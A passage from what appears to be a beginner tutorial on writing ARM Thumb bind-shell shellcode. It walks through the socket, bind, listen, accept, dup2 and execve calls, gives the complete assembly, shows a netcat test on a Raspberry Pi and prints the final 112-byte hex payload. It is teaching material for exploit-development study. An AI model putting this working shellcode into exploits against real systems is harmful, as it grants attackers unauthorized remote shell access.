The first STRB instruction replaces the placeholder xff in \x02\xff with x00 to set the AF_INET to \x02\x00. How do we know that it’s a null byte being stored? Because r2 contains 0’s only due to the “sub r2, r2, r2” instruction which cleared the register. The next 4 instructions replace 1.1.1.1 with 0.0.0.0. Instead of the four strb instructions after strb r2, [r1, #1], you can also use one single str r2, [r1, #4] to do a full 0.0.0.0 write.

The move instruction puts the length of the sockaddr_in structure length (2 bytes for AF_INET, 2 bytes for PORT, 4 bytes for ipaddress, 8 bytes padding = 16 bytes) into r2. Then, we set r7 to 282 by simply adding 1 to it, because r7 already contains 281 from the last syscall.

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr   // pointer to address, port
    strb r2, [r1, #1]     // write 0 for AF_INET
    strb r2, [r1, #4]     // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]     // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]     // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]     // replace 1 with 0 in 0.0.0.x
    mov r2, #16
    add r7, #1            // r7 = 281+1 = 282 (bind syscall number) 
    svc #1
    nop

3 – Listen for Incoming Connections

Here we put the previously saved host_sockid into r0. R1 is set to 2, and r7 is just increased by 2 since it still contains the 282 from the last syscall.

mov     r0, r4     // r0 = saved host_sockid 
mov     r1, #2
add     r7, #2     // r7 = 284 (listen syscall number)
svc     #1

4 – Accept Incoming Connection

 

Here again, we put the saved host_sockid into r0. Since we want to avoid null bytes, we use don’t directly move #0 into r1 and r2, but instead, set them to 0 by subtracting them from each other. R7 is just increased by 1. The result of this invocation will be our client_sockid, which we will save in r4, because we will no longer need the host_sockid that was kept there (we will skip the close function call from our C code).

    mov     r0, r4          // r0 = saved host_sockid 
    sub     r1, r1, r1      // clear r1, r1 = 0
    sub     r2, r2, r2      // clear r2, r2 = 0
    add     r7, #1          // r7 = 285 (accept syscall number)
    svc     #1
    mov     r4, r0          // save result (client_sockid) in r4

5 – STDIN, STDOUT, STDERR

 

For the dup2 functions, we need the syscall number 63. The saved client_sockid needs to be moved into r0 once again, and sub instruction sets r1 to 0. For the remaining two dup2 calls, we only need to change r1 and reset r0 to the client_sockid after each system call.

    /* dup2(client_sockid, 0) */
    mov     r7, #63                // r7 = 63 (dup2 syscall number) 
    mov     r0, r4                 // r4 is the saved client_sockid 
    sub     r1, r1, r1             // r1 = 0 (stdin) 
    svc     #1
    /* dup2(client_sockid, 1) */
    mov     r0, r4                 // r4 is the saved client_sockid 
    add     r1, #1                 // r1 = 1 (stdout) 
    svc     #1
    /* dup2(client_sockid, 2) */
    mov     r0, r4                 // r4 is the saved client_sockid
    add     r1, #1                 // r1 = 1+1 (stderr) 
    svc     #1

6 – Spawn the Shell

 

 

// execve("/bin/sh", 0, 0) 
 adr r0, shellcode     // r0 = location of "/bin/shX"
 eor r1, r1, r1        // clear register r1. R1 = 0
 eor r2, r2, r2        // clear register r2. r2 = 0
 strb r2, [r0, #7]     // store null-byte for AF_INET
 mov r7, #11           // execve syscall number
 svc #1
 nop

The execve() function we use in this example follows the same process as in the Writing ARM Shellcode tutorial where everything is explained step by step.

Finally, we put the value AF_INET (with 0xff, which will be replaced by a null), the port number, IP address, and the “/bin/sh” string at the end of our assembly code.

struct_addr:
.ascii "\x02\xff"      // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"     // port number 4444 
.byte 1,1,1,1        // IP Address 
shellcode:
.ascii "/bin/shX"
FINAL ASSEMBLY CODE

This is what our final bind shellcode looks like.

.section .text
.global _start
    _start:
    .ARM
    add r3, pc, #1         // switch to thumb mode 
    bx r3

    .THUMB
// socket(2, 1, 0)
    mov r0, #2
    mov r1, #1
    sub r2, r2, r2      // set r2 to null
    mov r7, #200        // r7 = 281 (socket)
    add r7, #81         // r7 value needs to be split 
    svc #1              // r0 = host_sockid value
    mov r4, r0          // save host_sockid in r4

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr // pointer to address, port
    strb r2, [r1, #1]    // write 0 for AF_INET
    strb r2, [r1, #4]    // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]    // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]    // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]    // replace 1 with 0 in 0.0.0.x
    mov r2, #16          // struct address length
    add r7, #1           // r7 = 282 (bind) 
    svc #1
    nop

// listen(sockfd, 0) 
    mov r0, r4           // set r0 to saved host_sockid
    mov r1, #2        
    add r7, #2           // r7 = 284 (listen syscall number) 
    svc #1        

// accept(sockfd, NULL, NULL); 
    mov r0, r4           // set r0 to saved host_sockid
    sub r1, r1, r1       // set r1 to null
    sub r2, r2, r2       // set r2 to null
    add r7, #1           // r7 = 284+1 = 285 (accept syscall)
    svc #1               // r0 = client_sockid value
    mov r4, r0           // save new client_sockid value to r4  

// dup2(sockfd, 0) 
    mov r7, #63         // r7 = 63 (dup2 syscall number) 
    mov r0, r4          // r4 is the saved client_sockid 
    sub r1, r1, r1      // r1 = 0 (stdin) 
    svc #1

// dup2(sockfd, 1)
    mov r0, r4          // r4 is the saved client_sockid 
    add r1, #1          // r1 = 1 (stdout) 
    svc #1

// dup2(sockfd, 2) 
    mov r0, r4          // r4 is the saved client_sockid
    add r1, #1          // r1 = 2 (stderr) 
    svc #1

// execve("/bin/sh", 0, 0) 
    adr r0, shellcode   // r0 = location of "/bin/shX"
    eor r1, r1, r1      // clear register r1. R1 = 0
    eor r2, r2, r2      // clear register r2. r2 = 0
    strb r2, [r0, #7]   // store null-byte for AF_INET
    mov r7, #11         // execve syscall number
    svc #1
    nop

struct_addr:
.ascii "\x02\xff" // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c" // port number 4444 
.byte 1,1,1,1 // IP Address 
shellcode:
.ascii "/bin/shX"
TESTING SHELLCODE

Save your assembly code into a file called bind_shell.s. Don’t forget the -N flag when using ld. The reason for this is that we use multiple the strb operations to modify our code section (.text). This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

pi@raspberrypi:~/bindshell $ as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell
pi@raspberrypi:~/bindshell $ ./bind_shell

Then, connect to your specified port:

pi@raspberrypi:~ $ netcat -vv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!
uname -a
Linux raspberrypi 4.4.34+ #3 Thu Dec 1 14:44:23 IST 2016 armv6l GNU/Linux

It works! Now let’s translate it into a hex string with the following command:

pi@raspberrypi:~/bindshell $ objcopy -O binary bind_shell bind_shell.bin
pi@raspberrypi:~/bindshell $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bind_shell.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x12\xa1\x4a\x70\x0a\x71\x4a\x71\x8a\x71\xca\x71\x10\x22\x01\x37\x01\xdf\xc0\x46\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x1a\x92\x1a\x01\x37\x01\xdf\x04\x1c\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58

Voilà, le bind shellcode! This shellcode is 112 bytes long. Since this is a beginner tutorial and to keep it simple, the shellcode is not as short as it could be. After making the initial shellcode work, you can try to find ways to reduce the amount of instructions, hence making the shellcode shorter.